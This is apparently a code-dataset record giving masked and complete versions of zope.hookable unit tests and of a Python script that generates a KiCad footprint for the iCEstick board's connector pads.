())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PyHookableMixin:\n <mask token>\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest('Hookable and PyHookable are the same')\n return hookable(*args, **kw)\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef return_bar():\n return 'BAR'\n\n\n<mask token>\n\n\nclass PyHookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n return _py_hookable(*args, **kw)\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest('Hookable and PyHookable are the same')\n return hookable(*args, **kw)\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-5": "##############################################################################\n#\n# Copyright (c) 2003 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Test the hookable support Extension\n\"\"\"\nimport unittest\n\n\ndef return_foo():\n return 'FOO'\n\n\ndef return_bar():\n return 'BAR'\n\n\ndef not_called():\n raise AssertionError(\"This should not be called\")\n\n\nclass PyHookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n return _py_hookable(*args, **kw)\n\n\nclass HookableMixin:\n\n def _callFUT(self, *args, **kw):\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n if hookable is _py_hookable:\n raise unittest.SkipTest(\"Hookable and PyHookable are the same\")\n return hookable(*args, **kw) # pragma: no cover\n\n\nclass PyHookableTests(PyHookableMixin,\n unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n\n def test_implementation_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.implementation\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n class C:\n pass\n\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin,\n unittest.TestCase):\n # Make sphinx docs for hooked objects work.\n # https://github.com/zopefoundation/zope.hookable/issues/6\n # We need to proxy __doc__ to the original,\n # and synthesize an empty __bases__ and a __dict__ attribute\n # if they're not present.\n\n def _check_preserves_doc(self, docs):\n self.assertEqual(\"I have some docs\", docs.__doc__)\n\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n class Docs:\n \"\"\"I have some docs\"\"\"\n\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n class C:\n pass\n\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n # Specifically for the C implementation, which has to deal with this\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\ndef test_suite():\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n",
"step-ids": [
20,
24,
28,
30,
35
]
}
|
[
20,
24,
28,
30,
35
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
<|reserved_special_token_0|>
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
<|reserved_special_token_0|>
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
<|reserved_special_token_0|>
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
<|reserved_special_token_0|>
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
<|reserved_special_token_0|>
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
<|reserved_special_token_0|>
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
<|reserved_special_token_0|>
filename = 'iCEstick.kicad_mod'
header = ''
footer = ''
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
designators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]
designators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',
'88', '90', '91', 'GND', '3V3']]
designators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads_j2 = []
x = oldX - 5.8
newY = oldY - 21.81 + 4.49 + 5 * 2.54
y = newY
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
y = newY
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads = pads_j1 + pads_j2 + pads_j3
newFootprint = header
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
f = open(filename, 'w')
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
from os.path import exists
from pad import *
filename = 'iCEstick.kicad_mod'
header = ''
footer = ''
if exists(filename):
f = open(filename)
footprint = f.read()
f.close()
headerEndIndex = footprint.find('(pad ')
header = footprint[:headerEndIndex]
lastPadIndex = headerEndIndex
while footprint.find('(pad ', lastPadIndex) > -1:
lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5
footerStartIndex = footprint.find('))', lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find('TE-Connectivity') < 0:
header = """(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ')'
designators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]
designators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',
'88', '90', '91', 'GND', '3V3']]
designators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j1[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads_j2 = []
x = oldX - 5.8
newY = oldY - 21.81 + 4.49 + 5 * 2.54
y = newY
for i in range(6):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated
=True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j2 += [newPad]
y -= 2.54
x -= 2.54
y = newY
for i in range(6):
newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated
=True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),
drill=drillDiameter)
pads_j2 += [newPad]
y -= 2.54
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
if i == 0:
shape = Shape.RECT
else:
shape = Shape.CIRCLE
newPad = Pad(designator=designators_j3[i], through_hole=True, plated=
True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=
drillDiameter)
pads_j1 += [newPad]
x -= 2.54
pads = pads_j1 + pads_j2 + pads_j3
newFootprint = header
for pad in pads:
newFootprint += str(pad) + '\n'
newFootprint += footer.strip()
print(newFootprint)
f = open(filename, 'w')
f.write(newFootprint)
f.close()
<|reserved_special_token_1|>
#!/usr/bin/python
# Point of origin (connector J3, pad 1, net 3V3)
x = 0.0
y = 0.0
drillDiameter = 1.0
padWidth = 1.6
from os.path import exists
from pad import *
filename="iCEstick.kicad_mod"
header = ""
footer = ""
if exists(filename):
# Read existing footprint
f = open(filename)
footprint = f.read()
f.close()
# Find the end of the header
headerEndIndex = footprint.find("(pad ")
header = footprint[:headerEndIndex]
# Find the end of the pads list
lastPadIndex = headerEndIndex
while (footprint.find("(pad ", lastPadIndex) > -1):
lastPadIndex = footprint.find("(pad ", lastPadIndex) + 5
footerStartIndex = footprint.find("))", lastPadIndex) + 2
footer = footprint[footerStartIndex:]
if header.find("TE-Connectivity") < 0:
header = \
"""(module iCEstick (layer F.Cu) (tedit 5BD73D6F)
(fp_text reference REF** (at 0 -12.7) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value iCEstick (at 0 25.4) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
"""
footer = ")"
#
# Generate pads according to schematic drawing
#
designators_j1 = ["3V3", "GND"] + [str(n) for n in range(112,120)]
designators_j2 = [ \
[str(n) for n in range(78,82)] + ["GND", "3V3"], \
["87", "88", "90", "91", "GND", "3V3"] \
]
designators_j3 = ["3V3", "GND", "62", "61", "60", "56", "48", "47", "45", "44"]
#
# J1 connector pad list
#
pads_j1 = []
oldX = x
oldY = y
y -= 21.81
for i in range(10):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j1[i],
through_hole = True,
plated = True,
shape = shape,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j1 += [newPad]
x -= 2.54
#
# J2 connector pad list
#
pads_j2 = []
x = oldX - 5.80
newY = oldY - 21.81 + 4.49 + 5*2.54
y = newY
for i in range(6):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j2[0][i],
through_hole = True,
plated = True,
shape = shape,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j2 += [newPad]
y -= 2.54
# Second (inner) row of pins of J2
x -= 2.54
y = newY
for i in range(6):
# Create pad object
newPad = Pad(
designator = designators_j2[1][i],
through_hole = True,
plated = True,
shape = Shape.CIRCLE,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j2 += [newPad]
y -= 2.54
#
# J3 connector pad list
#
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j3[i],
through_hole = True,
plated = True,
shape = shape,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j1 += [newPad]
x -= 2.54
# Make a list of all pads
pads = pads_j1 + pads_j2 + pads_j3
# Compose new footprint from header, pads and footer
newFootprint = header
for pad in pads:
newFootprint += str(pad) + "\n"
newFootprint += footer.strip()
# Print generated footprint to screen
print(newFootprint)
# Save generated footprint to file
f = open(filename, "w")
f.write(newFootprint)
f.close()
|
flexible
|
{
"blob_id": "c71e367ad320d7eadabbbfda728d94448db6441d",
"index": 2109,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\n<mask token>\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\n<mask token>\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\n<mask token>\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\n<mask token>\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\n<mask token>\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\n<mask token>\nf.write(newFootprint)\nf.close()\n",
"step-3": "x = 0.0\ny = 0.0\ndrillDiameter = 1.0\npadWidth = 1.6\n<mask token>\nfilename = 'iCEstick.kicad_mod'\nheader = ''\nfooter = ''\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\ndesignators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]\ndesignators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',\n '88', '90', '91', 'GND', '3V3']]\ndesignators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads_j2 = []\nx = oldX - 5.8\nnewY = oldY - 21.81 + 4.49 + 5 * 2.54\ny = newY\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\ny = newY\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads = pads_j1 + pads_j2 + pads_j3\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\nf = open(filename, 'w')\nf.write(newFootprint)\nf.close()\n",
